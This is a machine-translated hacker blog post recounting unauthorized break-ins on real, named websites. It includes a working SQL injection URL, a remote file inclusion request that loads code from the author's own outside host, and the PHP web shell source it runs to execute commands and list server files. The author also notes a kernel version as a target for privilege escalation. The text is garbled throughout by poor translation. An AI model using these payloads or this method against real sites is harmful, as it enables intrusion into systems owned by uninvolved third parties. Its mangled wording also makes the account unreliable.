An article about the hacking, but without the traditional happy end

Hello, you navenoe think it's some kind of joke or a misprint.
Not at all. Typically, hackers write articles with titles "" As has been compromised ... "
In this article we will also hacking, but without the traditional happy end. Although you never know ...

One of these days my Asya knocks people with the offer to get him access to the same resource.
Make me was nothing special and I agreed. After reviewing the URL to them, I saw a little bit of information interesting:
http://www.russianspain.com/phpinfo.php
and respectively:
http://www.russianspain.com/php.ini

Climb on the site, I found another opportunity to perform sql-injection, but not an error message, and I decided to leave it for later.
Breaking through ip site, I saw that it was registered more than 400 sites. I decided to systematically sort through them until I find a buggy.
Several times I came across the second branch of phpBB forums, but the sql-injection was cut at all. Submenu cookies I got access to the admin panel, and sbekapil base in the hope that one of the passwords to come up and ftp.
Once I caught Advanced Guestbook 2.2, inktsiya to access the admin work, but to access and edit template needed more valid parameter of the session, so I was constantly and disposing on the login page.
There were a few sites with sql-injection, such as:
http://www.joehenke.com/gallery_view.php?galleryid=16+UNION+SELECT+1/*
but pull out of them something worthwhile I failed once.

This lasted until until I came across up-glass.com, site of "Unipack" company that produces packaging for the alcohol industry in Russia.
Seeing that the files inkluda, I tried to connect to your shell narod.ru:
http://up-glass.com/former.php?folder=http://durito.narod.ru/sh&cmd=ls

The server returns an error message:
Warning: lmenu (): php_network_getaddresses: getaddrinfo failed: Temporary failure in name resolution in /home/upglass/public_html/func.php on line 40

Warning: lmenu (http://durito.narod.ru/sh/config.p): failed to open stream: Success in /home/upglass/public_html/func.php on line 40

All became clear at once, I quickly poured into your website's config.p file with the following content:
<?
echo "<DIV align = left> <PRE>";
system ($ _ GET [ 'cmd ']);
echo "</ PRE> </ DIV>";
?>

and the following query:
http://up-glass.com/former.php?folder=http://durito.narod.ru/&cmd=ls
already gave me a list of site files

But I could not view the directories of other users, even public_html was not available to me.

The core was fresh:
Linux cpanel05.gzo.com 2.6.11.11 # 1 SMP Tue May 31 14:02:19 CDT 2005 i686 i686 i386 GNU / Linux
on rue could forget.

Then I decided to go back to the sql-injection at www.russianspain.com. Only now casually tossed View on the site content.
I saw that vzlyad creators of the site with respect to the Russian president and his policies are very close to mine. After reading the article, I was determined to leave one of the last free voices of the opposition alone.
Moreover, I wrote to them about the vulnerabilities on the site, and asked to hang a banner "Stop Putin!".

That's the story.


Your bug Durito.
_________________
EAT THE RICH!